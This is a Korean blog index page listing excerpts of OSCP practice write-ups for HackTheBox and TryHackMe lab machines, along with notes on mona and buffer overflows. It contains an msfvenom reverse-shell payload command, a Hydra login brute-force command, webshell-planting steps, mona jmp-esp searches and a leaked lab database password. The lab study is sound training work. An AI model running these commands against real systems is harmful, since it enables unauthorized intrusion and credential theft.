OSCP 97

[Windows] Grandpa & Granny

Grandpa & Granny - webdav를 이용한 Exploit - 단순히 메타스플로잇 사용하는 연습장 - 그래서 사용자들의 Rating이 낮은 듯.. local exploit 전에.. 1. 프로세스 migrate 2. temp폴더 이동 3. 미터프리터로 리버스 페이로드 설정(OSCP대비하려면 netcat) 4. 페이로드에 따라 쉘 반응 무응답일 수 있음 또는 서버 응답오류.. > unstaged vs staged 낮은 권한으로 쉘에 접근되기 때문에 프로세스중 migrate를 사용해 더 높은 권한유저로 변경해야 함 whoami로 봤을때는 NT...Network service로 나오지만 낮은 권한 사용자라 getuid등 명령어 해석이 안됨, getuid returns the real user ID o..

OSCP/HackTheBox 2020.05.25

[Linux] Blocky

Blocky gobuster로 URL 퍼징 10.10.10.37/plugins => jar파일 다운로드 => 리버싱 public String sqlUser = "root"; public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22"; phpmyadmin 접근 10.10.10.37/phpmyadmin 워드프레스 유저 테이블로 접근하여 notch 관리자 패스워드 변경 10.10.10.37/wp-login.php 관리자 로그인하여 플러그인을 수정하여 리버스 웹쉘로 실행 http://10.10.10.37/wp-includes/themes/akismet/ 웹서버 침투 후 터미널 SU 에러 발생: PHP를 통한 쉘에서 su하면 오류가 발생함 'su' command in Docker r..

OSCP/HackTheBox 2020.05.23

[Windows] Optimum

커널 익스플로잇 windows exploit suggester 공격 대상 systeminfo 결과 복사 후 로컬에 systeminfo.txt 생성 * hotfix 정보까지 저장해야 missing-patch 취약점도 찾아낼 수 있다. cmd> systeminfo I found some Hotfix's A hotfix or quick-fix engineering update is a single, cumulative package that includes information that is used to address a problem in a software product. DB업데이트 python windows-exploit-suggester.py --update Exploit 검색 python wind..

OSCP/HackTheBox 2020.05.21

[Linux] Beep

Beep 1. 계정 탈취보다 웹 퍼징을 먼저하자! 2. Exploit 설명 요약 보기 *searchsploit -x 번호 3. LFI로 passwd 가져왔을때 이쁘게 보려면 페이지 소스보기 클릭하면 됨 4. PHP는 WAS가 해석하기 때문에 디렉토리 리스팅 웹상에서 클릭하여도 실행이 안됨 5. 재사용 비번 체크하자. 1. nmap recon -> searchsploit 특별한 정보 없었음 2. 디폴트 계정접근, 히드라 브루트포스 전부 실패 3. 웹 서버 베너 recon => 취약한 php버전 발견 => 단순 dos용 overflow.. > curl -I 10.10.10.7 -L -k 4. URL DRI 퍼징 (gobuster) => admin 302 => 소스코드에 비번 노출 => SSH의 root 계정..

OSCP/HackTheBox 2020.05.19

[Windows] Devel

Devel * 웹에서 venom 쉘이 실행되도록 was가 실행가능한 포멧으로 페이로드를 생성하여 업로드. Armed with the ability to upload files, it is possible to drop an aspx reverse shell on the target and execute it by browsing to the file via the web server. The following command will create the aspx file: msfvenom -p windows/meterpreter/reverse_tcp LHOST=호스트 LPORT=포트 -f aspx > devel.aspx 다음과 같이 curl을 사용하여 콘솔에서 트리거 할 수 있음 curl -g 10.10...

OSCP/HackTheBox 2020.05.19

mona

■ 우선 다양한 명령에 적용 가능한 Global Options가 존재한다. 중요한 옵션들은 다음과 같다. -n // 널바이트가 포함된 주소 제외 -o // OS에 종속된 모듈 제외 -m // 특정 모듈 지정 -cm // aslr, safeseh 등 조건 지정 -cpb // 금지 문자 지정 ■ assemble/asm 어셈블리어를 기계어로 보여준다. 명령 사이는 #으로 구분한다. !mona asm -s "pop eax#pop ecx#ret" ■ DLL을 지정하여 jmp esp의 코드를 찾음 !mona find -s "\xff\xe4" -m slmmfc.dll !mona find -s "jmp esp" -m slmmfc.dll ■ findwild findwild는 "*"를 이용한 검색을 할 수 있도록 해준다...

[Linux] MrRobot

정보탐색 NMAP, WpScan, Nikto 배운점 1. Recon할 때, nikto를 활용하는 점 잊지 말자 2. 로컬권한상승을 위해 취약점 탐색용으로 LinEnum 스크립트를 활용할 수 있다. 3. WPSCAN(xmlrpc 이용한 로그인 브루트포스를 지원한다.) 4. 터미널에서 export TERM=screen 입력하면 clear 명령어를 사용할 수 있다. 히드라(웹 폼 브루트포스) - 성공,실패 메세지 유무를 통해 아이디 존재도 확인 가능함. 아이디 브루트 포싱(S:성공, F:실패시 메세지, 생략시 실패시 메세지) hydra -L 파일명 -p qwerqweqwrqwe 아이피 -V http-form-post 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+..

OSCP/TryHackMe 2020.05.13

Hacking with Powershell

Hacking with Powershell 키 포인트 정리 * Property는 필드와 같은 의미며 생략할 수 있다. * 싱글쿼터를 사용시 에러가 발생한다. * 파워 쉘은 객체를 사용한다. * 명령어에 대한 약어를 제공한다. get-help 로 확인가능 일반적으로 자주 사용되는 verb * 리스트 확인: > get-verb - Get - Start - Stop - Read - Write - New - Out Using Get-Help >Get-Help Command-Name Using Get-Command Get-Command는 현재 컴퓨터에 설치된 모든 cmdlet을 가져옵니다. 이 cmdlet의 장점은 다음과 같은 패턴 일치를 허용한다는 것입니다. Get-Command Verb-* or Get-Com..

OSCP/TryHackMe 2020.05.06

버퍼오버플로우

2020/07/15 - TryHackme gatekeeper.exe - 퍼징을 테스트할 때, 마지막에 라인피드 문자열이 필요하다. 문자열 끝에 라인피드, \r\n를 붙여주지 않으면 서버측에서는 아직 클라이언트의 데이터 송신이 끝나지 않았다고 판단하여 계속 대기하게 된다. (이것은 프로그램마다 다르다, 라인피드가 없어도 자체적으로 붙여서 처리하도록 구현된 프로그램도 있다.) - EXITFUNC=thread 같은 옵션은 기본 익스플로잇부터 먼저 성공시키고 여유가 있을때 추가하도록한다. (옵션 붙이면 안되는 APP도 존재) - 버퍼오버플로우 트리거 이후 쉘 스페이스가 충분하지 않기 때문에 한번 더 생각해보아야 하는 문제 - 쉘을 페이로드 어디에 위치 시킬 것이며 어떻게 EIP를 컨트롤하여 트리거 할 것인가? ..

OSCP/시험대비 2020.05.04